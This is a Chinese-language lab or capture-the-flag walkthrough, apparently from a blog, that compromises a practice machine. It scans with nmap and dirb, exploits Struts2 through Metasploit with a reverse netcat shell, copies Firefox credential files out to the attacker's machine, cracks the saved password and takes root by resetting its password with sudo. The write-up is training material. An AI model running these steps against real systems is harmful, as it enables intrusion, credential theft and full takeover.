先对目标靶机的网段进行扫描,用nmap命令
nmap -sS 10.9.63.0/24
发现目标IP为10.9.63.158(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有8080端口开放,打开网页输入ip加上端口号8080进行查看
http://10.9.63.121:8080/
发现是Apache Tomcat安装网站,F12检查一下,源码也看一下,发现没有什么有用的信息
用dirb对目录信息扫描
dirb http://10.9.63.121:8080/
试着去访问一下网站目录
发现是用的Apache Tomcat Servlet/JSP container的容器,百度搜索一下用的什么web框架,发现是struts2
打开kali进入msf
msfconsole
搜索一下struts2框架有哪些漏洞
search struts2
我们利用第四个进行攻击
use 4
查看一下都需要哪些配置
show options
配置一下攻击载核
set payload cmd/unix/reverse_netcat
配置一下RHOSTS
rhosts 10.9.63.121(ip是目标靶机ip)
配置一下lport
set lport 9999
运行
run
发现已经有一条了,用sessions查看一下
sessions
看到有一条ID为1的进程,用sessions 1进入
sessions 1
发现已经进入了,id查看一下,发现是普通用户
id
输入python3 -c “import pty;pty.spawn(‘/bin/bash’)”,进入交互模式
python3 -c "import pty;pty.spawn('/bin/bash')"
进入到家目录看看有哪些东西
发现有一个用户minhtuan,cd进去看看有哪些文件(隐藏文件也要看)
ls -alh
通过之前查询资料知道火狐浏览器的密码文件存放在~/.mozilla/firefox/fvbljmev.default-release这个路径(key4.db、logins.json),根据路径进入到该目录下
发现该目录文件夹中确实有这两个文件,把这两个文件拷贝到kali里,开启远程服务(端口号只要是不重复就行)
python3 -m http.server 7272
再开启一个终端,用wget的方式下载那两个文件
根据之前搜集的信息找到火狐python脚本,把脚本文件放到kali中,和刚才下载的两个文件放到同一个目录中
第一个文件是火狐的py脚本文件,第二个和第三个是咱们从靶机下载的密钥脚本文件,第四个是安装包的环境
安装一下pip3,需要一点时间
pip3 install -r requirements.txt
使用火狐脚本
python3 huohupj.py
发现破解了用户名为:minhtuan,密码:skysayohyeah
最开始扫描的时候发现开起了22端口和8080端口,我们可以用ssh远程登录进入到靶机
minhtuan@10.9.63.121
查看一下id,发现是普通用户,sudo -l看一下有哪些管理员权限,发现是三个ALL,相当于管理员权限
我们更改一下root管理员账号密码,用sudu,输入新密码
sudo passwd root
用su命令登录root管理员账号,密码为刚刚更改的
su root
进入root管理员用户查看id,发现uid为0,已经是管理员权限,提权成功啦!!!
我们cat一下root下的root.txt文件,goodjob you!
218
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
